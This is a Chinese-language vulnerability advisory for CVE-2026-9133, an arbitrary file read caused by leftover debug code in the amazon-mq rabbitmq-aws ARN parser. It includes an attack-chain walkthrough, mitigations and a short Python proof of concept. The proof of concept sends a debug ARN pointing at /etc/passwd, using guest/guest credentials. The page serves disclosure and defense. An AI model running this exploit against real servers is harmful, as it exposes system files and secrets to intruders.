CVE-2026-9133 CVSS 7.7 高危

CVE-2026-9133 amazon-mq rabbitmq-aws 调试代码致任意文件读取

披露日期: 2026-05-20

来源: ff89ba41-3aa1-4d27-914a-91399e9639e5

漏洞信息

漏洞编号

CVE-2026-9133

漏洞类型

任意文件读取

CVSS评分

7.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

amazon-mq rabbitmq-aws

漏洞概述

CVE-2026-9133 是 amazon-mq rabbitmq-aws 组件中的一个高危漏洞。在 0.2.1 版本之前，ARN 解析器中遗留了活跃的调试代码。攻击者可利用特定的调试 ARN 方案（arn:aws-debug:file），通过 PUT /api/aws/arn/validate 验证接口，在经过身份认证的情况下读取 RabbitMQ 进程权限范围内的任意敏感文件。该漏洞可能导致关键信息泄露，且若使用 TLS，需轮换私钥。

技术细节

该漏洞的根本原因在于 amazon-mq rabbitmq-aws 插件在发布前未完全移除用于开发的调试逻辑。具体而言，ARN 解析器错误地保留了对 `arn:aws-debug:file` 方法的支持。当向 `/api/aws/arn/validate` 端点发送 PUT 请求时，系统未严格校验 ARN 格式，导致调试逻辑被触发。攻击者只需拥有低权限的账户认证（PR:L），即可构造包含目标文件路径的恶意 ARN 请求。由于该调试代码直接读取文件系统内容且未做充分的访问控制，攻击者可以利用此机制遍历并读取 RabbitMQ 服务进程有权限访问的任意文件，从而获取系统敏感信息或配置数据。

攻击链分析

STEP 1

步骤1：信息收集与认证

攻击者发现目标运行了受影响版本的 rabbitmq-aws，并获取了一个低权限的认证账户（PR:L）。

STEP 2

步骤2：构造恶意请求

攻击者构造一个 PUT 请求发送至 /api/aws/arn/validate，其中包含精心设计的调试 ARN，如 arn:aws-debug:file:///etc/passwd。

STEP 3

步骤3：触发漏洞读取文件

服务器端解析器处理该调试 ARN，读取指定文件路径的内容并将其返回给攻击者，导致敏感信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target-host:15672/api/aws/arn/validate"
# The vulnerable endpoint accepts PUT requests with a debug ARN scheme
# Example target file: /etc/passwd
payload = {
    "arn": "arn:aws-debug:file:///etc/passwd"
}

headers = {
    "Content-Type": "application/json"
}

# Authentication is required (PR:L)
auth = ("guest", "guest")

try:
    response = requests.put(target_url, json=payload, headers=headers, auth=auth)
    if response.status_code == 200:
        print("[+] Exploit successful! File content:")
        print(response.text)
    else:
        print(f"[-] Failed with status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"Error: {e}")

影响范围

amazon-mq rabbitmq-aws < 0.2.1

防御指南

临时缓解措施

如果无法立即升级，应严格限制对 /api/aws/arn/validate 端点的网络访问权限，仅允许受信任的内网IP或管理主机访问。同时，监控日志中是否存在包含 arn:aws-debug:file 的异常请求，并加强RabbitMQ的用户权限管理，确保未授权用户无法获取低权限账户。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表